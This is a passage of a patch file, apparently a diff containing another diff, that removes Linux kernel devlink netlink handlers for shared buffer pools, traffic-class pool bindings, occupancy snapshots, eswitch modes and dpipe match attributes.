+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_TC_COUNT,
+-			devlink_sb->ingress_tc_count))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_TC_COUNT,
+-			devlink_sb->egress_tc_count))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_sb_get_doit(struct sk_buff *skb,
+-				      struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
+-				 DEVLINK_CMD_SB_NEW,
+-				 info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_sb_get_dumpit(struct sk_buff *msg,
+-					struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
+-						 DEVLINK_CMD_SB_NEW,
+-						 NETLINK_CB(cb->skb).portid,
+-						 cb->nlh->nlmsg_seq,
+-						 NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_sb_pool_fill(struct sk_buff *msg, struct devlink *devlink,
+-				   struct devlink_sb *devlink_sb,
+-				   u16 pool_index, enum devlink_command cmd,
+-				   u32 portid, u32 seq, int flags)
+-{
+-	struct devlink_sb_pool_info pool_info;
+-	void *hdr;
+-	int err;
+-
+-	err = devlink->ops->sb_pool_get(devlink, devlink_sb->index,
+-					pool_index, &pool_info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_info.pool_type))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_SIZE, pool_info.size))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE,
+-		       pool_info.threshold_type))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_CELL_SIZE,
+-			pool_info.cell_size))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_sb_pool_get_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	u16 pool_index;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (!devlink->ops->sb_pool_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_pool_fill(msg, devlink, devlink_sb, pool_index,
+-				      DEVLINK_CMD_SB_POOL_NEW,
+-				      info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __sb_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
+-				struct devlink *devlink,
+-				struct devlink_sb *devlink_sb,
+-				u32 portid, u32 seq)
+-{
+-	u16 pool_count = devlink_sb_pool_count(devlink_sb);
+-	u16 pool_index;
+-	int err;
+-
+-	for (pool_index = 0; pool_index < pool_count; pool_index++) {
+-		if (*p_idx < start) {
+-			(*p_idx)++;
+-			continue;
+-		}
+-		err = devlink_nl_sb_pool_fill(msg, devlink,
+-					      devlink_sb,
+-					      pool_index,
+-					      DEVLINK_CMD_SB_POOL_NEW,
+-					      portid, seq, NLM_F_MULTI);
+-		if (err)
+-			return err;
+-		(*p_idx)++;
+-	}
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_sb_pool_get_dumpit(struct sk_buff *msg,
+-					     struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (!devlink->ops->sb_pool_get)
+-			goto retry;
+-
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			err = __sb_pool_get_dumpit(msg, start, &idx, devlink,
+-						   devlink_sb,
+-						   NETLINK_CB(cb->skb).portid,
+-						   cb->nlh->nlmsg_seq);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-		}
+-		devl_unlock(devlink);
+-retry:
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_sb_pool_set(struct devlink *devlink, unsigned int sb_index,
+-			       u16 pool_index, u32 size,
+-			       enum devlink_sb_threshold_type threshold_type,
+-			       struct netlink_ext_ack *extack)
+-
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-
+-	if (ops->sb_pool_set)
+-		return ops->sb_pool_set(devlink, sb_index, pool_index,
+-					size, threshold_type, extack);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_pool_set_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	enum devlink_sb_threshold_type threshold_type;
+-	struct devlink_sb *devlink_sb;
+-	u16 pool_index;
+-	u32 size;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_th_type_get_from_info(info, &threshold_type);
+-	if (err)
+-		return err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_POOL_SIZE))
+-		return -EINVAL;
+-
+-	size = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_POOL_SIZE]);
+-	return devlink_sb_pool_set(devlink, devlink_sb->index,
+-				   pool_index, size, threshold_type,
+-				   info->extack);
+-}
+-
+-static int devlink_nl_sb_port_pool_fill(struct sk_buff *msg,
+-					struct devlink *devlink,
+-					struct devlink_port *devlink_port,
+-					struct devlink_sb *devlink_sb,
+-					u16 pool_index,
+-					enum devlink_command cmd,
+-					u32 portid, u32 seq, int flags)
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-	u32 threshold;
+-	void *hdr;
+-	int err;
+-
+-	err = ops->sb_port_pool_get(devlink_port, devlink_sb->index,
+-				    pool_index, &threshold);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
+-		goto nla_put_failure;
+-
+-	if (ops->sb_occ_port_pool_get) {
+-		u32 cur;
+-		u32 max;
+-
+-		err = ops->sb_occ_port_pool_get(devlink_port, devlink_sb->index,
+-						pool_index, &cur, &max);
+-		if (err && err != -EOPNOTSUPP)
+-			goto sb_occ_get_failure;
+-		if (!err) {
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
+-				goto nla_put_failure;
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
+-				goto nla_put_failure;
+-		}
+-	}
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-sb_occ_get_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_sb_port_pool_get_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	u16 pool_index;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (!devlink->ops->sb_port_pool_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_port_pool_fill(msg, devlink, devlink_port,
+-					   devlink_sb, pool_index,
+-					   DEVLINK_CMD_SB_PORT_POOL_NEW,
+-					   info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __sb_port_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
+-				     struct devlink *devlink,
+-				     struct devlink_sb *devlink_sb,
+-				     u32 portid, u32 seq)
+-{
+-	struct devlink_port *devlink_port;
+-	u16 pool_count = devlink_sb_pool_count(devlink_sb);
+-	u16 pool_index;
+-	int err;
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list) {
+-		for (pool_index = 0; pool_index < pool_count; pool_index++) {
+-			if (*p_idx < start) {
+-				(*p_idx)++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_port_pool_fill(msg, devlink,
+-							   devlink_port,
+-							   devlink_sb,
+-							   pool_index,
+-							   DEVLINK_CMD_SB_PORT_POOL_NEW,
+-							   portid, seq,
+-							   NLM_F_MULTI);
+-			if (err)
+-				return err;
+-			(*p_idx)++;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_sb_port_pool_get_dumpit(struct sk_buff *msg,
+-						  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (!devlink->ops->sb_port_pool_get)
+-			goto retry;
+-
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			err = __sb_port_pool_get_dumpit(msg, start, &idx,
+-							devlink, devlink_sb,
+-							NETLINK_CB(cb->skb).portid,
+-							cb->nlh->nlmsg_seq);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-		}
+-		devl_unlock(devlink);
+-retry:
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_sb_port_pool_set(struct devlink_port *devlink_port,
+-				    unsigned int sb_index, u16 pool_index,
+-				    u32 threshold,
+-				    struct netlink_ext_ack *extack)
+-
+-{
+-	const struct devlink_ops *ops = devlink_port->devlink->ops;
+-
+-	if (ops->sb_port_pool_set)
+-		return ops->sb_port_pool_set(devlink_port, sb_index,
+-					     pool_index, threshold, extack);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_port_pool_set_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_sb *devlink_sb;
+-	u16 pool_index;
+-	u32 threshold;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
+-		return -EINVAL;
+-
+-	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
+-	return devlink_sb_port_pool_set(devlink_port, devlink_sb->index,
+-					pool_index, threshold, info->extack);
+-}
+-
+-static int
+-devlink_nl_sb_tc_pool_bind_fill(struct sk_buff *msg, struct devlink *devlink,
+-				struct devlink_port *devlink_port,
+-				struct devlink_sb *devlink_sb, u16 tc_index,
+-				enum devlink_sb_pool_type pool_type,
+-				enum devlink_command cmd,
+-				u32 portid, u32 seq, int flags)
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-	u16 pool_index;
+-	u32 threshold;
+-	void *hdr;
+-	int err;
+-
+-	err = ops->sb_tc_pool_bind_get(devlink_port, devlink_sb->index,
+-				       tc_index, pool_type,
+-				       &pool_index, &threshold);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_TC_INDEX, tc_index))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_type))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
+-		goto nla_put_failure;
+-
+-	if (ops->sb_occ_tc_port_bind_get) {
+-		u32 cur;
+-		u32 max;
+-
+-		err = ops->sb_occ_tc_port_bind_get(devlink_port,
+-						   devlink_sb->index,
+-						   tc_index, pool_type,
+-						   &cur, &max);
+-		if (err && err != -EOPNOTSUPP)
+-			return err;
+-		if (!err) {
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
+-				goto nla_put_failure;
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
+-				goto nla_put_failure;
+-		}
+-	}
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_sb_tc_pool_bind_get_doit(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	enum devlink_sb_pool_type pool_type;
+-	u16 tc_index;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
+-						pool_type, &tc_index);
+-	if (err)
+-		return err;
+-
+-	if (!devlink->ops->sb_tc_pool_bind_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink, devlink_port,
+-					      devlink_sb, tc_index, pool_type,
+-					      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
+-					      info->snd_portid,
+-					      info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
+-					int start, int *p_idx,
+-					struct devlink *devlink,
+-					struct devlink_sb *devlink_sb,
+-					u32 portid, u32 seq)
+-{
+-	struct devlink_port *devlink_port;
+-	u16 tc_index;
+-	int err;
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list) {
+-		for (tc_index = 0;
+-		     tc_index < devlink_sb->ingress_tc_count; tc_index++) {
+-			if (*p_idx < start) {
+-				(*p_idx)++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
+-							      devlink_port,
+-							      devlink_sb,
+-							      tc_index,
+-							      DEVLINK_SB_POOL_TYPE_INGRESS,
+-							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
+-							      portid, seq,
+-							      NLM_F_MULTI);
+-			if (err)
+-				return err;
+-			(*p_idx)++;
+-		}
+-		for (tc_index = 0;
+-		     tc_index < devlink_sb->egress_tc_count; tc_index++) {
+-			if (*p_idx < start) {
+-				(*p_idx)++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
+-							      devlink_port,
+-							      devlink_sb,
+-							      tc_index,
+-							      DEVLINK_SB_POOL_TYPE_EGRESS,
+-							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
+-							      portid, seq,
+-							      NLM_F_MULTI);
+-			if (err)
+-				return err;
+-			(*p_idx)++;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_cmd_sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (!devlink->ops->sb_tc_pool_bind_get)
+-			goto retry;
+-
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			err = __sb_tc_pool_bind_get_dumpit(msg, start, &idx,
+-							   devlink,
+-							   devlink_sb,
+-							   NETLINK_CB(cb->skb).portid,
+-							   cb->nlh->nlmsg_seq);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-		}
+-		devl_unlock(devlink);
+-retry:
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_sb_tc_pool_bind_set(struct devlink_port *devlink_port,
+-				       unsigned int sb_index, u16 tc_index,
+-				       enum devlink_sb_pool_type pool_type,
+-				       u16 pool_index, u32 threshold,
+-				       struct netlink_ext_ack *extack)
+-
+-{
+-	const struct devlink_ops *ops = devlink_port->devlink->ops;
+-
+-	if (ops->sb_tc_pool_bind_set)
+-		return ops->sb_tc_pool_bind_set(devlink_port, sb_index,
+-						tc_index, pool_type,
+-						pool_index, threshold, extack);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_tc_pool_bind_set_doit(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	enum devlink_sb_pool_type pool_type;
+-	struct devlink_sb *devlink_sb;
+-	u16 tc_index;
+-	u16 pool_index;
+-	u32 threshold;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
+-						pool_type, &tc_index);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
+-		return -EINVAL;
+-
+-	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
+-	return devlink_sb_tc_pool_bind_set(devlink_port, devlink_sb->index,
+-					   tc_index, pool_type,
+-					   pool_index, threshold, info->extack);
+-}
+-
+-static int devlink_nl_cmd_sb_occ_snapshot_doit(struct sk_buff *skb,
+-					       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const struct devlink_ops *ops = devlink->ops;
+-	struct devlink_sb *devlink_sb;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	if (ops->sb_occ_snapshot)
+-		return ops->sb_occ_snapshot(devlink, devlink_sb->index);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_occ_max_clear_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const struct devlink_ops *ops = devlink->ops;
+-	struct devlink_sb *devlink_sb;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	if (ops->sb_occ_max_clear)
+-		return ops->sb_occ_max_clear(devlink, devlink_sb->index);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_eswitch_fill(struct sk_buff *msg, struct devlink *devlink,
+-				   enum devlink_command cmd, u32 portid,
+-				   u32 seq, int flags)
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-	enum devlink_eswitch_encap_mode encap_mode;
+-	u8 inline_mode;
+-	void *hdr;
+-	int err = 0;
+-	u16 mode;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = devlink_nl_put_handle(msg, devlink);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	if (ops->eswitch_mode_get) {
+-		err = ops->eswitch_mode_get(devlink, &mode);
+-		if (err)
+-			goto nla_put_failure;
+-		err = nla_put_u16(msg, DEVLINK_ATTR_ESWITCH_MODE, mode);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	if (ops->eswitch_inline_mode_get) {
+-		err = ops->eswitch_inline_mode_get(devlink, &inline_mode);
+-		if (err)
+-			goto nla_put_failure;
+-		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_INLINE_MODE,
+-				 inline_mode);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	if (ops->eswitch_encap_mode_get) {
+-		err = ops->eswitch_encap_mode_get(devlink, &encap_mode);
+-		if (err)
+-			goto nla_put_failure;
+-		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_ENCAP_MODE, encap_mode);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_eswitch_get_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_eswitch_fill(msg, devlink, DEVLINK_CMD_ESWITCH_GET,
+-				      info->snd_portid, info->snd_seq, 0);
+-
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_rate_nodes_check(struct devlink *devlink, u16 mode,
+-				    struct netlink_ext_ack *extack)
+-{
+-	struct devlink_rate *devlink_rate;
+-
+-	list_for_each_entry(devlink_rate, &devlink->rate_list, list)
+-		if (devlink_rate_is_node(devlink_rate)) {
+-			NL_SET_ERR_MSG_MOD(extack, "Rate node(s) exists.");
+-			return -EBUSY;
+-		}
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_eswitch_set_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const struct devlink_ops *ops = devlink->ops;
+-	enum devlink_eswitch_encap_mode encap_mode;
+-	u8 inline_mode;
+-	int err = 0;
+-	u16 mode;
+-
+-	if (info->attrs[DEVLINK_ATTR_ESWITCH_MODE]) {
+-		if (!ops->eswitch_mode_set)
+-			return -EOPNOTSUPP;
+-		mode = nla_get_u16(info->attrs[DEVLINK_ATTR_ESWITCH_MODE]);
+-		err = devlink_rate_nodes_check(devlink, mode, info->extack);
+-		if (err)
+-			return err;
+-		err = ops->eswitch_mode_set(devlink, mode, info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]) {
+-		if (!ops->eswitch_inline_mode_set)
+-			return -EOPNOTSUPP;
+-		inline_mode = nla_get_u8(
+-				info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]);
+-		err = ops->eswitch_inline_mode_set(devlink, inline_mode,
+-						   info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]) {
+-		if (!ops->eswitch_encap_mode_set)
+-			return -EOPNOTSUPP;
+-		encap_mode = nla_get_u8(info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]);
+-		err = ops->eswitch_encap_mode_set(devlink, encap_mode,
+-						  info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-int devlink_dpipe_match_put(struct sk_buff *skb,
+-			    struct devlink_dpipe_match *match)
+-{
+-	struct devlink_dpipe_header *header = match->header;
+-	struct devlink_dpipe_field *field = &header->fields[match->field_id];
+-	struct nlattr *match_attr;
+-
+-	match_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_MATCH);
+-	if (!match_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_MATCH_TYPE, match->type) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, match->header_index) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, match_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, match_attr);
+-	return -EMSGSIZE;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_match_put);
+-
+-static int devlink_dpipe_matches_put(struct devlink_dpipe_table *table,
+-				     struct sk_buff *skb)
+-{
+-	struct nlattr *matches_attr;
+-
+-	matches_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_TABLE_MATCHES);
+-	if (!matches_attr)
+-		return -EMSGSIZE;
+-
